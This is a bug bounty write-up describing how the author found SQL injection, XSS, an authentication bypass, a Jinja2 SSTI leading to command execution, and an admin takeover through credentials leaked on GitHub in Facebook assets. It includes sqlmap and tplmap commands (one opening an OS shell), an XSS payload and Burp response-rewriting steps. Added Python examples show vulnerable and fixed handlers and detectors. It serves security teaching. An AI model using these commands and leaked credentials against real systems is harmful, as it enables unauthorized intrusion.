Hey Hunters, Hello Infosec Community
I am Orwa [https://twitter.com/GodfatherOrwa]
This is my 2nd writeup. The first one is about Full Map To Github Recon And Leaks Exposure (Click here to read). I have seen many people getting hall of fames and bounties from Facebook, and Aditi Singh, a smart girl, is the one who motivated me to work on this program [https://twitter.com/aditi_singghh]
As you see in the title, in this writeup I will speak about How I Found, not What I Found.
What matters to me here is for the reader to learn.
So I will talk about all my discoveries in Facebook, duplicate and accepted, and a part of my methodology.
Also HackerX007 is on the Bugcrowd leaderboard rankings: Top 10 on P1, Top 100 on the full ranking.
1 Server-Side Template Injection To RCE (Critical)
2 SQL Injection [2] (Critical)
3 Authentication Bypass(Critical)
4 Privilege Escalation (Critical)
5 Multiple Reflected XSS (Medium)
1 FFUF or Dirsearch, I like both
2 A good word list: I like to use the legend Random Robbie's word list https://github.com/random-robbie/bruteforce-lists
3 Amass for subdomains. I also check GitHub for subdomains, and you can also fuzz for subdomains using a good wordlist. The good commands that I use for Amass:
For a list of domains ==> amass enum -passive -norecursive -noalts -df list-domains.txt -o subs.txt
For a single domain ==> amass enum -passive -norecursive -noalts -d domain -o subs.txt
4 Httpx and httprobe and Nmap
cat subs.txt | httpx -o live-subs.txt
cat sub.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -p https:10000 -p http:9000 -p https:9443 -c 50 | tee live-subs2.txt
5 Wappalyzer extension
6 Burp Pro with these extensions:
Collaborator Everywhere
XSS Validator
Wsdler
.NET Beautifier
Bypass WAF
J2EEScan
Param Miner
Wayback Machine
JS Link Finder
Upload Scanner
Nucleus Burp Extension
Software Vulnerability Scanner
Active Scan++
7 Acunetix Scanner, or if you are looking for something free and cool, [reNgine]
SQL Injection [2] & Authentication Bypass & XSS [2]
I started my recon by checking for some cool domains by dorking for Facebook on GitHub. Dorking to find domains and some cool endpoints:
So what dorks did I try?
org:facebookresearch ftp
org:facebookresearch Ldap
org:facebookresearch https://
Finally, after about 30 min of dorking, the last dork I still remember:
org:facebookresearch language:python .php
I got lucky and found an interesting endpoint; it was
domain/login/_ajax/verify-2fa.php
When I visited this domain it was an employee panel owned by Instagram.
I directly started looking for SQL injection: testing the query with `1'` returned an error containing `MySQL`, so now the parameter `username` looks vulnerable.
So on Burp I intercepted the request and saved a copy in a txt file.
On sqlmap I ran this command:
sqlmap -r request.txt -p username --dbms="MySQL" --force-ssl --level 5 --risk 3 --dbs --hostname
and BooM, it's done.
After that I spidered the full host and fuzzed for `php` using a php word list, and then ran Active Scan on Burp for all the POST requests.
`Keep the maximum insertion points per base request at 10`
What I found:
another SQL injection
2 XSS, payload `"><img src=x onerror=alert(1)>`
The SQLi was closed as duplicate because the security team already knew about it and were working to fix it; for the XSS, 1 duplicate and 1 accepted.
Here HackerX007 messed around a bit,
and as he is also an artist with manual testing, he found a very cool Authentication Bypass.
Authentication Bypass that allows an unauthenticated user to take actions
When you visit domain/location/?5 you will be redirected to the login page, but in Burp, when you visit it, you will be redirected and yet the Content-Length of the redirect response is so big: 6443.
After looking into the response he found out that in this 302 response the panel was there without any authentication, in the 302 response content. So after some playing with Burp match and replace it was possible to bypass authentication and take some actions. At first I thought it's just a front-end bypass, but I found out I can take actions, like enable / disable Bucket.
#Repro Steps
1. In Burp match and replace add this:
type: response header
match: HTTP/1.1 302 Found
replace: HTTP/1.1 200 ok
__
type: response header
match: Location: ../login/?redirect=//location/?5
replace:
2. Now go to domain/location/?5
BooM
4. When you are done you can [Logout] 😂
This Authentication Bypass was accepted.
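As an added illustration (not code from the original post or from the panel in question), this Python sketch shows the class of bug behind the bypass: an application that renders the protected page and only then decides to redirect, beside a handler that fails closed, plus the kind of response check a defender can run over their own endpoints. The handler names, the session format and the panel markup are constructed.

```python
# Constructed stand-in for the protected page; large enough that a redirect
# carrying it stands out by Content-Length alone (the post saw 6443).
PANEL_HTML = (
    "<html><body><h1>Server panel</h1><table>"
    + "".join(
        f"<tr><td>bucket-{i}</td><td><a href='?enable={i}'>enable</a>"
        f"<a href='?disable={i}'>disable</a></td></tr>"
        for i in range(40)
    )
    + "</table></body></html>"
)

def render_panel() -> str:
    # Stand-in for the real panel template (constructed sample content).
    return PANEL_HTML

def handle_request_vulnerable(session: dict, path: str):
    """Renders the protected page first and checks auth afterwards: the status
    becomes 302 and Location is set, but the full panel still ships as the body.
    A client that simply treats the 302 as a 200 sees the whole page."""
    body = render_panel()
    status, headers = 200, {}
    if not session.get("authenticated"):
        status = 302
        headers["Location"] = "../login/?redirect=" + path
    headers["Content-Length"] = str(len(body))
    return status, headers, body

def handle_request_fixed(session: dict, path: str):
    """Fails closed: the auth check runs before any rendering and the
    redirect carries an empty body, so ignoring the 302 yields nothing."""
    if not session.get("authenticated"):
        headers = {"Location": "../login/?redirect=" + path, "Content-Length": "0"}
        return 302, headers, ""
    body = render_panel()
    return 200, {"Content-Length": str(len(body))}, body

def suspicious_redirect(status: int, headers: dict, threshold: int = 1024) -> bool:
    """Audit check for your own endpoints: a 3xx whose body is much larger than
    a bare redirect page deserves a look."""
    body_len = int(headers.get("Content-Length", "0"))
    return 300 <= status < 400 and body_len > threshold
```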
I started recon for IPs belonging to Facebook.
The good dorks you can use in this case:
If you are looking for domains or IPs belonging to the program:
Org:"FaceBook Inc." without 200, you don't need live IPs in this case
If you are looking for cool subs or IPs on the domain:
Ssl.cert.subject.CN:"facebook.com" 200
So I found an interesting IP that included port 10000, but it wasn't working,
so I scanned that IP with Nmap: nmap -sV ip
It showed port 8443 open.
When I checked it [it's an AWS host owned by Facebook].
Now I collected a lot of IPs like this and sent them to Acunetix to scan in the background.
After about 1 hour I came back to check on Acunetix and it showed this IP vulnerable to SSTI, and the payload was set in the parameter `mode`, which calls debug in Python. So I tried the normal payload {{5*5}} and found 25 in the source. The easy and fast way here to check is to use the tplmap tool, which is similar to sqlmap. To install:
git clone https://github.com/epinna/tplmap.git
After testing this parameter it showed it's vulnerable to SSTI.
So my command was:
./tplmap.py -u "https://ip:8443/consent?assignmentId=debugKUymD&hitId=debugiwTmj&mode=debug*"
===>
GET parameter: mode
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
What made me happy here is that
python code evaluation is OK,
which means I can do
command execution on the shell, and
bind and reverse shell,
and
file write and read,
but not in all cases.
So all I needed was to connect to a shell:
./tplmap.py -u "https://ip:8443/consent?assignmentId=debugKUymD&hitId=debugiwTmj&mode=debug*" --os-shell
I only checked `id` and pinged Burp.
BooM
This SSTI was accepted.
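Added example, not from the original post or from the affected application: the Jinja2 mistake that tplmap's report above points at, reproduced in a few lines so the fix is concrete. The handler names and the template text are assumptions; the `mode` parameter name comes from the URL above.

```python
from jinja2 import Environment

# Autoescape protects against HTML injection in the fixed handler; it does
# nothing for the vulnerable one, because there the input never goes
# through a variable at all.
env = Environment(autoescape=True)

def debug_page_vulnerable(mode: str) -> str:
    """The query parameter becomes part of the template *source*, so any
    {{ ... }} inside `mode` is compiled and executed by Jinja2.
    This is what turns {{5*5}} into 25 in the page source."""
    source = "<p>debug mode: " + mode + "</p>"
    return env.from_string(source).render()

def debug_page_fixed(mode: str) -> str:
    """The template source is a constant written by the developer; the
    parameter is passed as data and only ever rendered as text."""
    source = "<p>debug mode: {{ mode }}</p>"
    return env.from_string(source).render(mode=mode)

def looks_like_template_probe(value: str) -> bool:
    """Cheap log/WAF signal for the probe used above ({{5*5}}) and the other
    Jinja2 delimiters. Defence in depth only; the real fix is debug_page_fixed."""
    return any(marker in value for marker in ("{{", "{%", "{#"))
```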
Here I visited crt.sh to take about 5 interesting domains:
https://crt.sh/?q=Facebook+Inc.
But for subdomain gathering I didn't want the normal way;
I fuzzed for subdomains with a good and big word list I made myself.
You can also make one for yourself.
After that I filtered to live hosts using httprobe:
cat sub.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -p https:10000 -p http:9000 -p https:9443 -c 50 | tee live-subs2.txt
So I found here a domain running on port 10000.
When I visited it, it was an interesting panel for managing servers and a lot of other things.
When I checked, it ran with a lot of technologies.
dirsearch on the panel and wow, a misconfiguration: some endpoints are accessible without any login. OK, it's a cool find to report, but still
without any privilege like edit, delete, add etc.
So I needed to keep working to find something good.
I also tried logging in with some default credentials but it didn't work. I also tried to sign up, but registration can't be done without logging in using admin credentials.
By checking some endpoints I found server info, and in that info the full name of the admin who created it.
So it took 5 min to find that employee's repo on GitHub.
So I started dorking on the employee's repo for any password.
I tried:
password
passwd
pwd
pass
pw
login
Found an internal host, user and password GitHub leak like this:
$host = ************
$User = ************
$pwd = ************
I scanned the internal host for ports, nothing open.
So I tried to log in using the username and the password, and BooM 😎🥳 it works with full privilege.
After login I can:
Full access and control
add users
delete users
Etc...
Also 1 stored XSS in this panel 😎
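Added example, not from the original post: a small repo-audit / pre-commit style check for the kind of leak described above, so the employee-side fix is as concrete as the finding. The regex, the variable names it matches and the sample file are constructed.

```python
import re

# Constructed pattern: PowerShell-style assignments to variables whose names
# suggest a host or credential (the leak above used $host, $User and $pwd,
# and the keywords are the ones the post dorked for).
CRED_VAR = re.compile(
    r"^\s*\$(?P<name>host|user|username|pass(?:word|wd)?|pwd|pw|login)\s*=\s*"
    r"(?P<value>['\"]?[^'\"\s#]+['\"]?)",
    re.IGNORECASE | re.MULTILINE,
)
PLACEHOLDERS = {"changeme", "xxx", "todo", "<redacted>", "************"}

def find_credential_assignments(text: str):
    """Return (line_number, variable, value) for each hard-coded assignment,
    skipping obvious placeholders and values read from other variables."""
    hits = []
    for m in CRED_VAR.finditer(text):
        value = m.group("value").strip("'\"")
        if value.lower() in PLACEHOLDERS or value.startswith("$"):
            continue
        line_no = text.count("\n", 0, m.start()) + 1
        hits.append((line_no, m.group("name"), value))
    return hits

# Constructed sample of the kind of script that ends up in a personal repo.
SAMPLE = """\
# connect to the internal panel
$host = "panel.internal.example"
$User = "svc-admin"
$pwd = "S3cretValue!"
$timeout = 30
$token = $env:API_TOKEN
$login = $User
"""

if __name__ == "__main__":
    for line_no, name, value in find_credential_assignments(SAMPLE):
        print(f"line {line_no}: ${name} is hard-coded ({value[:3]}...)")
```

Values pulled from the environment (`$env:...`) or from another variable pass the check; literal strings do not, which is the behaviour you want before a push to a public repo.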
I hope you guys have enjoyed the reading,
and I hope you learn and find bugs, and tweet about that for me, that will make me happy.
Stay safe dears.
I am not good at writeups; if there are spelling mistakes please ignore them.
The biggest lie
is when they tell you: it's not simple.
If someone tells you it's not simple, 90% will give up.
Everything is simple in this life;
it just needs 2 things:
1- No matter what happens ==> Never ever give up
2- Arrange your work, arrange your life, arrange your time
Do not work in any field in life in a random way.
Thanks all
https://twitter.com/GodfatherOrwa
Don't forget to also follow HackerX007, I suggest everyone follow him.